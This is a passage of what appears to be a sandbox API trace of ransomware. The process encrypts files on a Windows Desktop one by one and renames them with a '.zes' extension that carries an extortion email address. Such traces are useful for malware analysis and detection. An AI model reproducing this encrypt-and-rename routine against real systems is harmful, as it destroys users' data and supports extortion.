pbData=0x2140020*, pdwDataLen=0x23ffc78*=0xe300, dwBufLen=0xe300 | out: pbData=0x2140020*, pdwDataLen=0x23ffc78*=0xe300) returned 1 [0134.273] SetFilePointerEx (in: hFile=0x124, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0134.274] WriteFile (in: hFile=0x124, lpBuffer=0x2140020*, nNumberOfBytesToWrite=0xe300, lpNumberOfBytesWritten=0x23ffc90, lpOverlapped=0x0 | out: lpBuffer=0x2140020*, lpNumberOfBytesWritten=0x23ffc90*=0xe300, lpOverlapped=0x0) returned 1 [0134.274] CryptDestroyKey (hKey=0x53a568) returned 1 [0134.274] SetFilePointerEx (in: hFile=0x124, liDistanceToMove=0xe3e4, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0134.274] SetEndOfFile (hFile=0x124) returned 1 [0134.278] GetProcessHeap () returned 0x520000 [0134.279] HeapFree (in: hHeap=0x520000, dwFlags=0x0, lpMem=0x544aa0 | out: hHeap=0x520000) returned 1 [0134.279] GetProcessHeap () returned 0x520000 [0134.279] HeapFree (in: hHeap=0x520000, dwFlags=0x0, lpMem=0x544b60 | out: hHeap=0x520000) returned 1 [0134.279] MoveFileW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\rFizuWFKJxS8V2i7l3.mkv" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\rfizuwfkjxs8v2i7l3.mkv"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\rFizuWFKJxS8V2i7l3.mkv.[4B2E4630].[johncastle@msgsafe.io].zes" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\rfizuwfkjxs8v2i7l3.mkv.[4b2e4630].[johncastle@msgsafe.io].zes")) returned 1 [0134.283] CloseHandle (hObject=0x124) returned 1 [0134.283] WaitForSingleObject (hHandle=0x118, dwMilliseconds=0x0) returned 0x102 [0134.283] FindNextFileW (in: hFindFile=0x544b08, lpFindFileData=0x23ffd20 | out: lpFindFileData=0x23ffd20*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x6135f5d0, ftCreationTime.dwHighDateTime=0x1d5df7d, ftLastAccessTime.dwLowDateTime=0x6e4a95b0, ftLastAccessTime.dwHighDateTime=0x1d5e215, ftLastWriteTime.dwLowDateTime=0x6e4a95b0, ftLastWriteTime.dwHighDateTime=0x1d5e215, nFileSizeHigh=0x0, nFileSizeLow=0xc8db, dwReserved0=0x0, dwReserved1=0xffff, cFileName="upgHuG7Awn9.mkv", cAlternateFileName="UPGHUG~1.MKV")) returned 1 [0134.283] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\upgHuG7Awn9.mkv" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\upghug7awn9.mkv"), dwDesiredAccess=0xc0000000, dwShareMode=0x4, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x124 [0134.283] GetProcessHeap () returned 0x520000 [0134.283] RtlAllocateHeap (HeapHandle=0x520000, Flags=0x0, Size=0x10) returned 0x544b60 [0134.283] CryptGenRandom (in: hProv=0x534c10, dwLen=0x10, pbBuffer=0x544b60 | out: pbBuffer=0x544b60) returned 1 [0134.283] SetFilePointerEx (in: hFile=0x124, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x23ffcb0 | out: lpNewFilePointer=0x0) returned 1 [0134.284] WriteFile (in: hFile=0x124, lpBuffer=0x23ffcc0*, nNumberOfBytesToWrite=0x5, lpNumberOfBytesWritten=0x23ffc90, lpOverlapped=0x0 | out: lpBuffer=0x23ffcc0*, lpNumberOfBytesWritten=0x23ffc90*=0x5, lpOverlapped=0x0) returned 1 [0134.285] CryptImportKey (in: hProv=0x534c10, pbData=0x544890, dwDataLen=0x2c, hPubKey=0x0, dwFlags=0x0, phKey=0x23ffc94 | out: phKey=0x23ffc94*=0x53a568) returned 1 [0134.285] CryptSetKeyParam (hKey=0x53a568, dwParam=0x1, pbData=0x544b60, dwFlags=0x0) returned 1 [0134.285] GetProcessHeap () returned 0x520000 [0134.285] RtlAllocateHeap (HeapHandle=0x520000, Flags=0x0, Size=0x40) returned 0x535588 [0134.285] CryptEncrypt (in: hKey=0x53a568, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x535588*, pdwDataLen=0x23ffc78*=0x40, dwBufLen=0x40 | out: pbData=0x535588*, pdwDataLen=0x23ffc78*=0x40) returned 1 [0134.285] CryptDestroyKey (hKey=0x53a568) returned 1 [0134.285] WriteFile (in: hFile=0x124, lpBuffer=0x535588*, nNumberOfBytesToWrite=0x40, lpNumberOfBytesWritten=0x23ffc90, lpOverlapped=0x0 | out: lpBuffer=0x535588*, lpNumberOfBytesWritten=0x23ffc90*=0x40, lpOverlapped=0x0) returned 1 [0134.285] WriteFile (in: hFile=0x124, lpBuffer=0x23ffc98*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x23ffc90, lpOverlapped=0x0 | out: lpBuffer=0x23ffc98*, lpNumberOfBytesWritten=0x23ffc90*=0x4, lpOverlapped=0x0) returned 1 [0134.285] WriteFile (in: hFile=0x124, lpBuffer=0x544b60*, nNumberOfBytesToWrite=0x10, lpNumberOfBytesWritten=0x23ffc90, lpOverlapped=0x0 | out: lpBuffer=0x544b60*, lpNumberOfBytesWritten=0x23ffc90*=0x10, lpOverlapped=0x0) returned 1 [0134.285] WriteFile (in: hFile=0x124, lpBuffer=0x544990*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x23ffc90, lpOverlapped=0x0 | out: lpBuffer=0x544990*, lpNumberOfBytesWritten=0x23ffc90*=0x80, lpOverlapped=0x0) returned 1 [0134.286] SetFilePointerEx (in: hFile=0x124, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x23ffcb8 | out: lpNewFilePointer=0x0) returned 1 [0134.286] WriteFile (in: hFile=0x124, lpBuffer=0x23ffca8*, nNumberOfBytesToWrite=0x8, lpNumberOfBytesWritten=0x23ffc90, lpOverlapped=0x0 | out: lpBuffer=0x23ffca8*, lpNumberOfBytesWritten=0x23ffc90*=0x8, lpOverlapped=0x0) returned 1 [0134.286] CryptImportKey (in: hProv=0x534c10, pbData=0x544890, dwDataLen=0x2c, hPubKey=0x0, dwFlags=0x0, phKey=0x23ffc94 | out: phKey=0x23ffc94*=0x53a568) returned 1 [0134.286] CryptSetKeyParam (hKey=0x53a568, dwParam=0x1, pbData=0x544b60, dwFlags=0x0) returned 1 [0134.286] SetFilePointerEx (in: hFile=0x124, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0134.286] ReadFile (in: hFile=0x124, lpBuffer=0x2140020, nNumberOfBytesToRead=0xc8db, lpNumberOfBytesRead=0x23ffc9c, lpOverlapped=0x0 | out: lpBuffer=0x2140020*, lpNumberOfBytesRead=0x23ffc9c*=0xc8db, lpOverlapped=0x0) returned 1 [0134.286] CryptEncrypt (in: hKey=0x53a568, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2140020*, pdwDataLen=0x23ffc78*=0xc8e0, dwBufLen=0xc8e0 | out: pbData=0x2140020*, pdwDataLen=0x23ffc78*=0xc8e0) returned 1 [0134.287] SetFilePointerEx (in: hFile=0x124, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0134.287] WriteFile (in: hFile=0x124, lpBuffer=0x2140020*, nNumberOfBytesToWrite=0xc8e0, lpNumberOfBytesWritten=0x23ffc90, lpOverlapped=0x0 | out: lpBuffer=0x2140020*, lpNumberOfBytesWritten=0x23ffc90*=0xc8e0, lpOverlapped=0x0) returned 1 [0134.287] CryptDestroyKey (hKey=0x53a568) returned 1 [0134.287] SetFilePointerEx (in: hFile=0x124, liDistanceToMove=0xc9b4, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0134.287] SetEndOfFile (hFile=0x124) returned 1 [0134.291] GetProcessHeap () returned 0x520000 [0134.291] HeapFree (in: hHeap=0x520000, dwFlags=0x0, lpMem=0x535588 | out: hHeap=0x520000) returned 1 [0134.291] GetProcessHeap () returned 0x520000 [0134.291] HeapFree (in: hHeap=0x520000, dwFlags=0x0, lpMem=0x544b60 | out: hHeap=0x520000) returned 1 [0134.291] MoveFileW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\upgHuG7Awn9.mkv" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\upghug7awn9.mkv"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\upgHuG7Awn9.mkv.[4B2E4630].[johncastle@msgsafe.io].zes" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\upghug7awn9.mkv.[4b2e4630].[johncastle@msgsafe.io].zes")) returned 1 [0134.296] CloseHandle (hObject=0x124) returned 1 [0134.296] WaitForSingleObject (hHandle=0x118, dwMilliseconds=0x0) returned 0x102 [0134.296] FindNextFileW (in: hFindFile=0x544b08, lpFindFileData=0x23ffd20 | out: lpFindFileData=0x23ffd20*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xc667d60, ftCreationTime.dwHighDateTime=0x1d5db8e, ftLastAccessTime.dwLowDateTime=0x80e68bc0, ftLastAccessTime.dwHighDateTime=0x1d5e76a, ftLastWriteTime.dwLowDateTime=0x80e68bc0, ftLastWriteTime.dwHighDateTime=0x1d5e76a, nFileSizeHigh=0x0, nFileSizeLow=0x136b, dwReserved0=0x0, dwReserved1=0xffff, cFileName="uSOZ4TNyZhhaa Gl3.bmp", cAlternateFileName="USOZ4T~1.BMP")) returned 1 [0134.296] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\uSOZ4TNyZhhaa Gl3.bmp" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\usoz4tnyzhhaa gl3.bmp"), dwDesiredAccess=0xc0000000, dwShareMode=0x4, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x124 [0134.296] GetProcessHeap () returned 0x520000 [0134.296] RtlAllocateHeap (HeapHandle=0x520000, Flags=0x0, Size=0x10) returned 0x544b60 [0134.296] CryptGenRandom (in: hProv=0x534c10, dwLen=0x10, pbBuffer=0x544b60 | out: pbBuffer=0x544b60) returned 1 [0134.296] SetFilePointerEx (in: hFile=0x124, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x23ffcb0 | out: lpNewFilePointer=0x0) returned 1 [0134.296] WriteFile (in: hFile=0x124, lpBuffer=0x23ffcc0*, nNumberOfBytesToWrite=0x5, lpNumberOfBytesWritten=0x23ffc90, lpOverlapped=0x0 | out: lpBuffer=0x23ffcc0*, lpNumberOfBytesWritten=0x23ffc90*=0x5, lpOverlapped=0x0) returned 1 [0134.298] CryptImportKey (in: hProv=0x534c10, pbData=0x544958, dwDataLen=0x2c, hPubKey=0x0, dwFlags=0x0, phKey=0x23ffc94 | out: phKey=0x23ffc94*=0x53a568) returned 1 [0134.298] CryptSetKeyParam (hKey=0x53a568, dwParam=0x1, pbData=0x544b60, dwFlags=0x0) returned 1 [0134.298] GetProcessHeap () returned 0x520000 [0134.298] RtlAllocateHeap (HeapHandle=0x520000, Flags=0x0, Size=0x50) returned 0x544aa0 [0134.298] CryptEncrypt (in: hKey=0x53a568, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x544aa0*, pdwDataLen=0x23ffc78*=0x50, dwBufLen=0x50 | out: pbData=0x544aa0*, pdwDataLen=0x23ffc78*=0x50) returned 1 [0134.298] CryptDestroyKey (hKey=0x53a568) returned 1 [0134.298] WriteFile (in: hFile=0x124, lpBuffer=0x544aa0*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x23ffc90, lpOverlapped=0x0 | out: lpBuffer=0x544aa0*, lpNumberOfBytesWritten=0x23ffc90*=0x50, lpOverlapped=0x0) returned 1 [0134.298] WriteFile (in: hFile=0x124, lpBuffer=0x23ffc98*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x23ffc90, lpOverlapped=0x0 | out: lpBuffer=0x23ffc98*, lpNumberOfBytesWritten=0x23ffc90*=0x4, lpOverlapped=0x0) returned 1 [0134.298] WriteFile (in: hFile=0x124, lpBuffer=0x544b60*, nNumberOfBytesToWrite=0x10, lpNumberOfBytesWritten=0x23ffc90, lpOverlapped=0x0 | out: lpBuffer=0x544b60*, lpNumberOfBytesWritten=0x23ffc90*=0x10, lpOverlapped=0x0) returned 1 [0134.298] WriteFile (in: hFile=0x124, lpBuffer=0x544a18*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x23ffc90, lpOverlapped=0x0 | out: lpBuffer=0x544a18*, lpNumberOfBytesWritten=0x23ffc90*=0x80, lpOverlapped=0x0) returned 1 [0134.298] SetFilePointerEx (in: hFile=0x124, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x23ffcb8 | out: lpNewFilePointer=0x0) returned 1 [0134.298] WriteFile (in: hFile=0x124, lpBuffer=0x23ffca8*, nNumberOfBytesToWrite=0x8, lpNumberOfBytesWritten=0x23ffc90, lpOverlapped=0x0 | out: lpBuffer=0x23ffca8*, lpNumberOfBytesWritten=0x23ffc90*=0x8, lpOverlapped=0x0) returned 1 [0134.298] CryptImportKey (in: hProv=0x534c10, pbData=0x544958, dwDataLen=0x2c, hPubKey=0x0, dwFlags=0x0, phKey=0x23ffc94 | out: phKey=0x23ffc94*=0x53a568) returned 1 [0134.298] CryptSetKeyParam (hKey=0x53a568, dwParam=0x1, pbData=0x544b60, dwFlags=0x0) returned 1 [0134.299] SetFilePointerEx (in: hFile=0x124, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0134.299] ReadFile (in: hFile=0x124, lpBuffer=0x2140020, nNumberOfBytesToRead=0x136b, lpNumberOfBytesRead=0x23ffc9c, lpOverlapped=0x0 | out: lpBuffer=0x2140020*, lpNumberOfBytesRead=0x23ffc9c*=0x136b, lpOverlapped=0x0) returned 1 [0134.299] CryptEncrypt (in: hKey=0x53a568, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2140020*, pdwDataLen=0x23ffc78*=0x1370, dwBufLen=0x1370 | out: pbData=0x2140020*, pdwDataLen=0x23ffc78*=0x1370) returned 1 [0134.299] SetFilePointerEx (in: hFile=0x124, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0134.299] WriteFile (in: hFile=0x124, lpBuffer=0x2140020*, nNumberOfBytesToWrite=0x1370, lpNumberOfBytesWritten=0x23ffc90, lpOverlapped=0x0 | out: lpBuffer=0x2140020*, lpNumberOfBytesWritten=0x23ffc90*=0x1370, lpOverlapped=0x0) returned 1 [0134.299] CryptDestroyKey (hKey=0x53a568) returned 1 [0134.299] SetFilePointerEx (in: hFile=0x124, liDistanceToMove=0x1454, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0134.299] SetEndOfFile (hFile=0x124) returned 1 [0134.306] GetProcessHeap () returned 0x520000 [0134.306] HeapFree (in: hHeap=0x520000, dwFlags=0x0, lpMem=0x544aa0 | out: hHeap=0x520000) returned 1 [0134.306] GetProcessHeap () returned 0x520000 [0134.306] HeapFree (in: hHeap=0x520000, dwFlags=0x0, lpMem=0x544b60 | out: hHeap=0x520000) returned 1 [0134.306] MoveFileW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\uSOZ4TNyZhhaa Gl3.bmp" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\usoz4tnyzhhaa gl3.bmp"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\uSOZ4TNyZhhaa Gl3.bmp.[4B2E4630].[johncastle@msgsafe.io].zes" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\usoz4tnyzhhaa gl3.bmp.[4b2e4630].[johncastle@msgsafe.io].zes")) returned 1 [0134.311] CloseHandle (hObject=0x124) returned 1 [0134.311] WaitForSingleObject (hHandle=0x118, dwMilliseconds=0x0) returned 0x102 [0134.311] FindNextFileW (in: hFindFile=0x544b08, lpFindFileData=0x23ffd20 | out: lpFindFileData=0x23ffd20*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x3998fd30, ftCreationTime.dwHighDateTime=0x1d5db4d, ftLastAccessTime.dwLowDateTime=0xf13f4520, ftLastAccessTime.dwHighDateTime=0x1d5dd2d, ftLastWriteTime.dwLowDateTime=0xf13f4520, ftLastWriteTime.dwHighDateTime=0x1d5dd2d, nFileSizeHigh=0x0, nFileSizeLow=0x2263, dwReserved0=0x0, dwReserved1=0xffff, cFileName="vvYk6R2xu.xlsx", cAlternateFileName="VVYK6R~1.XLS")) returned 1 [0134.311] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\vvYk6R2xu.xlsx" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\vvyk6r2xu.xlsx"), dwDesiredAccess=0xc0000000, dwShareMode=0x4, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x124 [0134.311] GetProcessHeap () returned 0x520000 [0134.311] RtlAllocateHeap (HeapHandle=0x520000, Flags=0x0, Size=0x10) returned 0x544b60 [0134.311] CryptGenRandom (in: hProv=0x534c10, dwLen=0x10, pbBuffer=0x544b60 | out: pbBuffer=0x544b60) returned 1 [0134.311] SetFilePointerEx (in: hFile=0x124, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x23ffcb0 | out: lpNewFilePointer=0x0) returned 1 [0134.311] WriteFile (in: hFile=0x124, lpBuffer=0x23ffcc0*, nNumberOfBytesToWrite=0xd, lpNumberOfBytesWritten=0x23ffc90, lpOverlapped=0x0 | out: lpBuffer=0x23ffcc0*, lpNumberOfBytesWritten=0x23ffc90*=0xd, lpOverlapped=0x0) returned 1 [0134.312] CryptImportKey (in: hProv=0x534c10, pbData=0x544890, dwDataLen=0x2c, hPubKey=0x0, dwFlags=0x0, phKey=0x23ffc94 | out: phKey=0x23ffc94*=0x53a568) returned 1 [0134.312] CryptSetKeyParam (hKey=0x53a568, dwParam=0x1, pbData=0x544b60, dwFlags=0x0) returned 1 [0134.312] GetProcessHeap () returned 0x520000 [0134.313] RtlAllocateHeap (HeapHandle=0x520000, Flags=0x0, Size=0x40) returned 0x535588 [0134.313] CryptEncrypt (in: hKey=0x53a568, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x535588*, pdwDataLen=0x23ffc78*=0x40, dwBufLen=0x40 | out: pbData=0x535588*, pdwDataLen=0x23ffc78*=0x40) returned 1 [0134.313] CryptDestroyKey (hKey=0x53a568) returned 1 [0134.313] WriteFile (in: hFile=0x124, lpBuffer=0x535588*, nNumberOfBytesToWrite=0x40, lpNumberOfBytesWritten=0x23ffc90, lpOverlapped=0x0 | out: lpBuffer=0x535588*, lpNumberOfBytesWritten=0x23ffc90*=0x40, lpOverlapped=0x0) returned 1 [0134.313] WriteFile (in: hFile=0x124, lpBuffer=0x23ffc98*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x23ffc90, lpOverlapped=0x0 | out: lpBuffer=0x23ffc98*, lpNumberOfBytesWritten=0x23ffc90*=0x4, lpOverlapped=0x0) returned 1 [0134.313] WriteFile (in: hFile=0x124, lpBuffer=0x544b60*, nNumberOfBytesToWrite=0x10, lpNumberOfBytesWritten=0x23ffc90, lpOverlapped=0x0 | out: lpBuffer=0x544b60*, lpNumberOfBytesWritten=0x23ffc90*=0x10, lpOverlapped=0x0) returned 1 [0134.313] WriteFile (in: hFile=0x124, lpBuffer=0x544990*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x23ffc90, lpOverlapped=0x0 | out: lpBuffer=0x544990*, lpNumberOfBytesWritten=0x23ffc90*=0x80, lpOverlapped=0x0) returned 1 [0134.313] SetFilePointerEx (in: hFile=0x124, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x23ffcb8 | out: lpNewFilePointer=0x0) returned 1 [0134.313] WriteFile (in: hFile=0x124, lpBuffer=0x23ffca8*, nNumberOfBytesToWrite=0x8, lpNumberOfBytesWritten=0x23ffc90, lpOverlapped=0x0 | out: lpBuffer=0x23ffca8*, lpNumberOfBytesWritten=0x23ffc90*=0x8, lpOverlapped=0x0) returned 1 [0134.313] CryptImportKey (in: hProv=0x534c10, pbData=0x544890, dwDataLen=0x2c, hPubKey=0x0, dwFlags=0x0, phKey=0x23ffc94 | out: phKey=0x23ffc94*=0x53a568) returned 1 [0134.313] CryptSetKeyParam (hKey=0x53a568, dwParam=0x1, pbData=0x544b60, dwFlags=0x0) returned 1 [0134.313] SetFilePointerEx (in: hFile=0x124, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0134.313] ReadFile (in: hFile=0x124, lpBuffer=0x2140020, nNumberOfBytesToRead=0x2263, lpNumberOfBytesRead=0x23ffc9c, lpOverlapped=0x0 | out: lpBuffer=0x2140020*, lpNumberOfBytesRead=0x23ffc9c*=0x2263, lpOverlapped=0x0) returned 1 [0134.314] CryptEncrypt (in: hKey=0x53a568, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2140020*, pdwDataLen=0x23ffc78*=0x2270, dwBufLen=0x2270 | out: pbData=0x2140020*, pdwDataLen=0x23ffc78*=0x2270) returned 1 [0134.314] SetFilePointerEx (in: hFile=0x124, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0134.314] WriteFile (in: hFile=0x124, lpBuffer=0x2140020*, nNumberOfBytesToWrite=0x2270, lpNumberOfBytesWritten=0x23ffc90, lpOverlapped=0x0 | out: lpBuffer=0x2140020*, lpNumberOfBytesWritten=0x23ffc90*=0x2270, lpOverlapped=0x0) returned 1 [0134.314] CryptDestroyKey (hKey=0x53a568) returned 1 [0134.314] SetFilePointerEx (in: hFile=0x124, liDistanceToMove=0x2344, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0134.314] SetEndOfFile (hFile=0x124) returned 1 [0134.347] GetProcessHeap () returned 0x520000 [0134.347] HeapFree (in: hHeap=0x520000, dwFlags=0x0, lpMem=0x535588 | out: hHeap=0x520000) returned 1 [0134.347] GetProcessHeap () returned 0x520000 [0134.347] HeapFree (in: hHeap=0x520000, dwFlags=0x0, lpMem=0x544b60 | out: hHeap=0x520000) returned 1 [0134.347] MoveFileW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\vvYk6R2xu.xlsx" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\vvyk6r2xu.xlsx"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\vvYk6R2xu.xlsx.[4B2E4630].[johncastle@msgsafe.io].zes" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\vvyk6r2xu.xlsx.[4b2e4630].[johncastle@msgsafe.io].zes")) returned 1 [0134.351] CloseHandle (hObject=0x124) returned 1 [0134.351] WaitForSingleObject (hHandle=0x118, dwMilliseconds=0x0) returned 0x102 [0134.351] FindNextFileW (in: hFindFile=0x544b08, lpFindFileData=0x23ffd20 | out: lpFindFileData=0x23ffd20*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x2910a5d0, ftCreationTime.dwHighDateTime=0x1d5d922, ftLastAccessTime.dwLowDateTime=0xc421c190, ftLastAccessTime.dwHighDateTime=0x1d5d908, ftLastWriteTime.dwLowDateTime=0xc421c190, ftLastWriteTime.dwHighDateTime=0x1d5d908, nFileSizeHigh=0x0, nFileSizeLow=0x957b, dwReserved0=0x0, dwReserved1=0xffff, cFileName="W83hY-ueVY.wav", cAlternateFileName="W83HY-~1.WAV")) returned 1 [0134.351] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\W83hY-ueVY.wav" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\w83hy-uevy.wav"), dwDesiredAccess=0xc0000000, dwShareMode=0x4, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x124 [0134.351] GetProcessHeap () returned 0x520000 [0134.351] RtlAllocateHeap (HeapHandle=0x520000, Flags=0x0, Size=0x10) returned 0x544b60 [0134.351] CryptGenRandom (in: hProv=0x534c10, dwLen=0x10, pbBuffer=0x544b60 | out: pbBuffer=0x544b60) returned 1 [0134.351] SetFilePointerEx (in: hFile=0x124, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x23ffcb0 | out: lpNewFilePointer=0x0) returned 1 [0134.352] WriteFile (in: hFile=0x124, lpBuffer=0x23ffcc0*, nNumberOfBytesToWrite=0x5, lpNumberOfBytesWritten=0x23ffc90, lpOverlapped=0x0 | out: lpBuffer=0x23ffcc0*, lpNumberOfBytesWritten=0x23ffc90*=0x5, lpOverlapped=0x0) returned 1 [0134.353] CryptImportKey (in: hProv=0x534c10, pbData=0x544958, dwDataLen=0x2c, hPubKey=0x0, dwFlags=0x0, phKey=0x23ffc94 | out: phKey=0x23ffc94*=0x53a568) returned 1 [0134.353] CryptSetKeyParam (hKey=0x53a568, dwParam=0x1, pbData=0x544b60, dwFlags=0x0) returned 1 [0134.353] GetProcessHeap () returned 0x520000 [0134.353] RtlAllocateHeap (HeapHandle=0x520000, Flags=0x0, Size=0x40) returned 0x535588 [0134.353] CryptEncrypt (in: hKey=0x53a568, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x535588*, pdwDataLen=0x23ffc78*=0x40, dwBufLen=0x40 | out: pbData=0x535588*, pdwDataLen=0x23ffc78*=0x40) returned 1 [0134.353] CryptDestroyKey (hKey=0x53a568) returned 1 [0134.353] WriteFile (in: hFile=0x124, lpBuffer=0x535588*, nNumberOfBytesToWrite=0x40, lpNumberOfBytesWritten=0x23ffc90, lpOverlapped=0x0 | out: lpBuffer=0x535588*, lpNumberOfBytesWritten=0x23ffc90*=0x40, lpOverlapped=0x0) returned 1 [0134.353] WriteFile (in: hFile=0x124, lpBuffer=0x23ffc98*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x23ffc90, lpOverlapped=0x0 | out: lpBuffer=0x23ffc98*, lpNumberOfBytesWritten=0x23ffc90*=0x4, lpOverlapped=0x0) returned 1 [0134.353] WriteFile (in: hFile=0x124, lpBuffer=0x544b60*, nNumberOfBytesToWrite=0x10, lpNumberOfBytesWritten=0x23ffc90, lpOverlapped=0x0 | out: lpBuffer=0x544b60*, lpNumberOfBytesWritten=0x23ffc90*=0x10, lpOverlapped=0x0) returned 1 [0134.353] WriteFile (in: hFile=0x124, lpBuffer=0x544a18*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x23ffc90, lpOverlapped=0x0 | out: lpBuffer=0x544a18*, lpNumberOfBytesWritten=0x23ffc90*=0x80, lpOverlapped=0x0) returned 1 [0134.353] SetFilePointerEx (in: hFile=0x124, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x23ffcb8 | out: lpNewFilePointer=0x0) returned 1 [0134.353] WriteFile (in: hFile=0x124, lpBuffer=0x23ffca8*, nNumberOfBytesToWrite=0x8, lpNumberOfBytesWritten=0x23ffc90, lpOverlapped=0x0 | out: lpBuffer=0x23ffca8*, lpNumberOfBytesWritten=0x23ffc90*=0x8, lpOverlapped=0x0) returned 1 [0134.354] CryptImportKey (in: hProv=0x534c10, pbData=0x544958, dwDataLen=0x2c, hPubKey=0x0, dwFlags=0x0, phKey=0x23ffc94 | out: phKey=0x23ffc94*=0x53a568) returned 1 [0134.354] CryptSetKeyParam (hKey=0x53a568, dwParam=0x1, pbData=0x544b60, dwFlags=0x0) returned 1 [0134.354] SetFilePointerEx (in: hFile=0x124, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0134.354] ReadFile (in: hFile=0x124, lpBuffer=0x2140020, nNumberOfBytesToRead=0x957b, lpNumberOfBytesRead=0x23ffc9c, lpOverlapped=0x0 | out: lpBuffer=0x2140020*, lpNumberOfBytesRead=0x23ffc9c*=0x957b, lpOverlapped=0x0) returned 1 [0134.354] CryptEncrypt (in: hKey=0x53a568, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2140020*, pdwDataLen=0x23ffc78*=0x9580, dwBufLen=0x9580 | out: pbData=0x2140020*, pdwDataLen=0x23ffc78*=0x9580) returned 1 [0134.355] SetFilePointerEx (in: hFile=0x124, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0134.355] WriteFile (in: hFile=0x124, lpBuffer=0x2140020*, nNumberOfBytesToWrite=0x9580, lpNumberOfBytesWritten=0x23ffc90, lpOverlapped=0x0 | out: lpBuffer=0x2140020*, lpNumberOfBytesWritten=0x23ffc90*=0x9580, lpOverlapped=0x0) 